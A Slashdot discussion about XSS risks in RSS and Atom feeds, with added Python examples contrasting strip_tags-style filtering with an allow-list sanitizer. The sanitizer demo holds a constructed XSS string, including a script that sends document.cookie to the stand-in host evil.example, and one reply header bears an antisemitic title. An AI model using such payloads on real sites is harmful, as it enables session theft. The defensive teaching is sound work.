RSS and Web Feeds a Risk?
A follow-up whitepaper [PDF] to a recent talk at the Black Hat security conference has been released, outlining the risks associated with web-based feeds such as RSS and Atom. From the article: "Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. 'A lot of blogs will take user comments and stick them into their own RSS feeds,' he said."
Huh? (Score:5, Insightful)
Re:Huh? (Score:1, Insightful)
Re:Huh? (Score:3, Insightful)
That is not to say that the feed cannot contain HTML characters; a description "Microsoft says the <a> tag is to be deprecated in Vista" is fully valid but should be treated as plain text, *not* HTML.
Sites which take
Re:Huh? (Score:2)
Rich
Re:Huh? (Score:2, Insightful)
You could have stopped here, and have been even more correct.
Re:Huh? (Score:2)
Re:Huh? (Score:1)
Re:Huh? (Score:4, Informative)
Quite annoying if you ask me. It shouldn't be executed if the script tag or javascript: doesn't exist.
That's why I always use a form of bbcode instead of html for comment forms.
Re:Huh? (Score:2)
PHP is limiting the way you consider solving the problem. Just because strip_tags() doesn't do the trick for MSIE doesn't mean there's no reliable way. This is the function PHP needs to bundle in its standard library. [slashdot.org]
Re:Huh? (Score:2)
Furthermore, your approach relies on a pr
Re:Huh? (Score:1)
Re:Huh? (Score:2)
That sounds pretty fallacious. Try again?
What was it that the post the parent linked to said? Ah yes: "The cause is not thinking of and treat
Re:Huh? (Score:2)
You don't seem to understand what I proposed. I'm describing building a whitelist of allowable HTML elements in a document. And advising you to make informed decisions on whether to support certain elements and attributes, erring on the side of not supporting them for the sake of security.
As an example, many know that JavaScript can be included, legally, in CSS. Let's say we're implementing the
Re:Huh? (Score:3, Interesting)
The second issue is with the "allowed tags" attribute of strip_tags. You may think to yourself that allowing <b>, <i> tags, etc. is pretty harmless. Except that there's st
Re:Huh? (Score:2)
Re:Huh? (Score:1)
Re:Huh? (Score:2, Interesting)
The second issue is with the "allowed tags" attribute of strip_tags. You may think to yourself that allowing <b>, <i>
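The two posts above (the one proposing an allow-list of elements and attributes, and the one warning that strip_tags() with an allowed-tags list is not enough) come down to one distinction that is easier to see in code. The following Python is an added example written for this page, not code from any commenter and not PHP's own implementation: strip_tags_like() is a hypothetical stand-in for strip_tags() with a second argument, the ALLOWED table is an illustrative policy, and the HOSTILE comment text is constructed.

```python
"""Tag-only filtering (PHP strip_tags() with an allowed-tags list) versus an allow-list of
elements *and* attributes. Added example for this page; sample input is constructed."""
import re
from html import escape
from html.parser import HTMLParser

# Illustrative policy: elements a feed reader might render, and the attributes each may keep.
# Anything not listed (onmouseover, onerror, style, ...) is dropped.
ALLOWED = {
    "b": set(), "i": set(), "em": set(), "strong": set(), "p": set(), "br": set(),
    "a": {"href", "title"},
    "img": {"src", "alt"},
}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID = {"br", "img"}


def strip_tags_like(markup, allowed_tags):
    """Hypothetical stand-in for strip_tags($s, '<b><i>'): tags outside the list are
    removed (their text is kept), tags inside it survive with ALL their attributes."""
    def keep_or_drop(m):
        return m.group(0) if m.group(1).lower() in allowed_tags else ""
    return re.sub(r"</?([a-zA-Z][a-zA-Z0-9]*)[^>]*>", keep_or_drop, markup)


def safe_url(value):
    """Accept only absolute http(s)/mailto URLs. Control characters and whitespace are
    removed first so a split scheme such as 'java<TAB>script:' cannot pass the check."""
    cleaned = re.sub(r"[\x00-\x20]", "", value).lower()
    return cleaned.startswith(SAFE_SCHEMES)


class Sanitizer(HTMLParser):
    """Rebuilds the fragment from the allow-list. <script>/<style> bodies are dropped
    entirely; text is re-escaped so entity tricks do not survive the round trip."""
    DROP_CONTENT = {"script", "style"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open, self.skip_depth = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED:
            return
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED[tag]:
                continue
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID:
            self.open.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in self.DROP_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open:
            return
        while self.open:  # close back to the matching element so output stays well-formed
            top = self.open.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self.open:  # close anything the input left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize(markup):
    s = Sanitizer()
    s.feed(markup)
    return s.result()


# Constructed attacker comment, of the kind a blog copies straight into its feed.
HOSTILE = ('Nice post <b onmouseover="alert(1)">thanks</b> '
           '<a href="javascript:alert(document.cookie)">link</a> '
           '<script>fetch("http://evil.example/?c="+document.cookie)</script>'
           '<img src="http://example.org/a.png" onerror="alert(2)">')

if __name__ == "__main__":
    print("tag-only filter :", strip_tags_like(HOSTILE, {"b", "i", "a", "img"}))
    print("allow-list      :", sanitize(HOSTILE))
```

The tag-only filter keeps the onmouseover on `<b>`, the `javascript:` href and the onerror on the image, and turns the `<script>` block into visible text rather than removing it. The element-and-attribute sanitizer keeps only what the policy names; because `style` is not in the policy, the CSS-hosted JavaScript mentioned earlier in the thread never reaches the page either. A reader that renders feeds in a browser control needs the same policy applied to Atom content marked type="html", not just to RSS descriptions.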
Re:Huh? (Score:2)
Re:Huh? (Score:3, Interesting)
The question is... (Score:2)
Re:The question is... (Score:1)
Hardly something new... (Score:2)
That's hardly news.
Re:Huh? (Score:1)
Old technique, new medium (Score:5, Insightful)
Nobody would think of performing no checking at all on things submitted into a plain old text box, so why would it be safe just because it's now in the "synergetic web 2.0 blogosphere of community-driven empowerment through technology"?
Oh well, still a moderately interesting article...
Re:Old technique, new medium (Score:5, Informative)
Exactly. This is a minor variation on the same old mistakes web developers usually make. It's just that a lot of developers seem to have forgotten that Atom and RSS feeds need to be sanitised just as much as any other untrusted input.
This is by no means a new concept; off the top of my head, I remember Mark Pilgrim [diveintomark.org] talking about this three years ago, and I remember thinking how damn obvious it was back then and being surprised that it was news to people.
I think one of the contributing factors is that a lot of borderline incompetent developers have learned to sanitise form input not because they understand the problem, but because they've simply had it hammered into their heads that they need to sanitise stuff that comes in through forms. Given a different form of input with exactly the same problem, they don't recognise that they need to sanitise it because it's not coming in through a form. They haven't learned why the problem exists, they've just memorised "form data == sanitise".
Re:Old technique, new medium (Score:5, Interesting)
So in the real world, a lot of sensible developers understand the problem with risky external input, although lots of baby-developers haven't had enough experience to get jaded and never trust users. Security thoughts come from age and being cynical.
But either way, the Web2.0 look irks me
Re:Old technique, new medium (Score:1)
So.. (Score:5, Insightful)
Just because something is some kind of "new" technology doesn't mean it's any different.
Use common sense and intelligence.
So..Carry and cash. (Score:1, Funny)
Excuse me, Tracer. You can keep the underwear.
Re:So.. (Score:5, Funny)
Re:So.. (Score:2)
Re:So.. (Score:2, Insightful)
Re:RSS Feed: Jews are the enemy! (Score:4, Funny)
Re:RSS Feed: Jews are the enemy! (Score:1)
Bloglines (Score:3, Informative)
Heh (Score:5, Funny)
Re:Heh (Score:2)
Yeah, Slashdot's RSS feature banned me a few times, too.
Re:Heh (Score:2, Funny)
Re:Heh (Score:1)
Why are you still using dial-up?
What sensible feed aggregator allows javascript? (Score:3, Insightful)
Someone please reassure me that Vista's aggregator does so as well. In fact, can anyone even refer to an aggregator that parses and enables javascript? I can't begin to think of where to find one.
Re:What sensible feed aggregator allows javascript (Score:3, Insightful)
From the article:
They don't name names, but it does seem like a number of aggregators do support JavaScript. And when the day comes where someone develops a "Web 2.0 AJAX enabled blog", there will be pressure for more and more aggregators to support JavaScript (likely it
Re:What sensible feed aggregator allows javascript (Score:2)
Re:What sensible feed aggregator allows javascript (Score:2)
The bottom line is that RSS readers must be as tight as tight web browsers (that is, preferably not based on IE).
Re:What sensible feed aggregator allows javascript (Score:2)
They saw it coming! (Score:3, Insightful)
What about Microsoft? (Score:1)
Re:What about Microsoft? (Score:2)
Since most people (me excluded) use pre-fabbed blog tools like Wordpress or online blog services, most feeds should already be sanitized.
Microsoft just have to make browser and email security a top issue in Vista, and disable most services (especially automatic execution) by def
don't trust input (Score:2)
RSS feeds shouldn't trust input from other systems; JavaScript and HTML should be filtered out.
Or, to simplify: no program should trust input of any type (user input, data from files, data from databases); validate and filter it before using it. If it isn't a cross-site scripting problem, it's a buffer overflow problem.
The slides can be found here (Score:3, Informative)
RSS Security Slides [cgisecurity.com]
#4 on the Threatdown - Refrigerators (Score:2)
Validation is the only problem (Score:3, Insightful)
The technology behind web feeds such as RSS and Atom (if you can call an XML file a 'technology') is perfectly safe, it is merely the content of the feed itself which can cause problems.
No one can stop a malicious user from setting up their own feed containing dangerous feeds. However, for existing blogs and weblogs, the validation methods to prevent the input of code and script into comment fields have been around and known about for several years.
Re:Validation is the only problem (Score:2)
I'm only using feeds like FoxNews, Google News, Yahoo News, CNN News, and of course, Slashdot. There are 13 in Opera, and 9 in Firefox.
The user can quickly set up additional feeds, I am sure. These may link to sites that are not trusted, I suppose.
Here [blogspot.com]
Can't be that high risk. (Score:1)
Simple rule for input (Score:4, Insightful)
You're missing the point - it's about the "reader" (Score:3, Insightful)
The bottom line here is that RSS/Atom reader programs need to apply similar security checks to those performed by popular secure web browsers.
RTFA
Oh God (Score:5, Insightful)
I can write virii in C++! It's a C++ vulnerability!
Seriously, this is dumb. It is not a problem with RSS/Atom, it is a problem with RSS/Atom viewers that allow JavaScript code to be executed!
Within the context of a web-based viewer this could be a problem, but then again it's no more of a problem than if you go to a questionable site with bad JavaScript. For a browser-based viewer it's simply a matter of the devs remembering to turn off JavaScript support for RSS/Atom feeds.
And in desktop-based viewers... I mean really, who would be stupid enough to even consider implementing JavaScript in one. And if it only does because the programmer took the lazy route and is using a WebControl in the background, well they might want to consider a different method that will actually give them some measure of CONTROL.
Speaking of poorly coded, I wonder if we'll see IE exploits arising from embedded ActiveX controls in RSS feeds, those would cause far more damage than while (1) { window.print(); window.alert("LOL INTERNET"); }.
Re:Oh God (Score:1, Offtopic)
Except that it CAN be virii (Score:2)
Re:Except that it CAN be virii (Score:3, Insightful)
VIRII is NOT a word.
Re:Except that it CAN be virii (Score:1, Insightful)
You do realise that Wikipedia isn't an authoritative source, don't you? And even if you trust Wikipedia as a source, if you read further [wikipedia.org]:
Re:Oh God (Score:2)
Feed formats are a vector for vulnerability. The proper analogy isn't "C++ is evil," it is "throwing feeds on your site without sanitization is as bright as running arbitrary executables from the Internet."
Pulling the Javascript, plugin, and ActiveX junk out of arbitrary XML data is much less trivial than "remembering to turn off JavaScript support." There is no such check box. This is apparently hard to get right, judging by the rash of XSS bugs. There needs to be the equivalent of such a check box i
Bogus (Score:5, Funny)
Re:Bogus (Score:1)
Just encode it, that's what I do (Score:2, Insightful)
Re:Just encode it, that's what I do (Score:2)
I don't know how to read XML document templates well enough. Can anyone confirm or deny if the elements are supposed to be able to contain HTML markup or whether they should be treated as plain text?
Rich
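On the question just asked (and on the earlier post arguing that a description such as "Microsoft says the <a> tag ..." must be treated as text): RSS 2.0 allows entity-encoded HTML in a description, and Atom instead labels each content element with a type attribute (text, html or xhtml). Either way, after XML parsing the reader is holding a string, and the markup inside it is not a tag until the reader chooses to render it as HTML. The Python below is an added example for this page, not from any commenter; the feed document is constructed.

```python
"""At the XML layer an RSS <description> is a string; it only becomes markup when the
reader renders it as HTML. Added example for this page; the feed below is constructed."""
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed feed. Items 1 and 2 carry the same HTML, once entity-encoded and once in a
# CDATA section; item 3 is a plain sentence that merely mentions a tag.
FEED = """<rss version="2.0"><channel><title>demo</title>
<item><title>entity-escaped</title>
<description>Hello &lt;b&gt;world&lt;/b&gt; &lt;script&gt;alert(1)&lt;/script&gt;</description></item>
<item><title>cdata</title>
<description><![CDATA[Hello <b>world</b> <script>alert(1)</script>]]></description></item>
<item><title>plain</title>
<description>Microsoft says the &lt;a&gt; tag is deprecated in Vista</description></item>
</channel></rss>"""


def descriptions(feed_xml):
    """Map item title -> description exactly as the XML parser delivers it. Both encodings
    decode to the identical string, so the parser cannot tell the reader whether the
    author meant markup or literal text."""
    root = ET.fromstring(feed_xml)
    return {i.findtext("title"): i.findtext("description") for i in root.iter("item")}


def as_text(description):
    """Treat the description as opaque text: escape it before placing it in HTML."""
    return html.escape(description, quote=True)


class TagCollector(HTMLParser):
    """Stand-in for the browser's HTML parser: records the elements a fragment creates."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_created(fragment):
    """Which elements would a browser build if this fragment were assigned to innerHTML?"""
    p = TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


if __name__ == "__main__":
    for title, desc in descriptions(FEED).items():
        print(f"{title:15} raw -> {elements_created(desc)}  escaped -> {elements_created(as_text(desc))}")
```

Rendered as HTML, the first two items both create a script element and the third loses its `<a>` to the browser's parser; escaped on output, all three display literally and create nothing. That is the whole decision: a reader that wants plain text escapes every time, and a reader that wants rich text has to sanitize rather than guess.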
Re:Just encode it, that's what I do (Score:1)
Re:Just encode it, that's what I do (Score:2)
Then again, there are situations where you may want to output HTML that has been input. That is easier to decide on the output side of things
Re:Just encode it, that's what I do (Score:1)
However, in my case it's not applicable. Maybe I should have clarified from the start that I'm working on an RSS Reader (a SharePoint web part derived from this one [asp.net]). So my content comes from feeds, not a database.
Color me stupid... (Score:5, Interesting)
And, as someone above suggested, what the hell is a "Web 2.0" RSS feed? Even if I used AJAX to make a nice-n-pretty UI for my blog, that still wouldn't explain why I would use JavaScript for my RSS feed.
Re:Color me stupid... (Score:1)
Re:Color me stupid... (Score:2)
Isn't the whole point of XML to provide the raw content in a simple format? Seems to me "less is more".
Unless... (Score:2)
Instinct says no.
In Case You Wanted RSS Comments ... (Score:2, Informative)
Blogger [blogger.com] doesn't (directly) support comment feeds. If you're interested in setting this up on your Blogspot blog (so you can, for example, get truly recent comments [editthis.info]), check out this bloghacking wiki [editthis.info].
I can't vouch for the security of these methods, though.
-Thetan.
Re:In Case You Wanted RSS Comments ... (Score:2)
I blog with malice! (Score:2)
Mood: h4xx0r
elmer FUD (Score:1)
Podcast files could contain viruses (Score:2)
Just predicting next week's USA Today exclusive.
Isn't the problem client side? (Score:1)
Not a big deal right now (Score:1)
Subscribing to an RSS feed isn't what the average user does, and I don't think you'd do it without realising. Most people won't even have an RSS reader installed.
But wait until Vista has mass adoption. It'll have RSS everywhere, and average users will start to use it. Then there will be a problem.
I told you so (Score:2)
Oh, my, now it turns out that RSS feeds have a potential vulnerability. What a surprise! Imagine now if RSS inherently had links deep within your OS.
Applications should be separated from the OS an
How about an example of malicious javascript? (Score:1)
Cheers
Matt
Re:How about an example of malicious javascript? (Score:1)
That's one example off the top of my head. I don't see how this relates to RSS feeds, but examples of malicious javascript injections are definitely out there.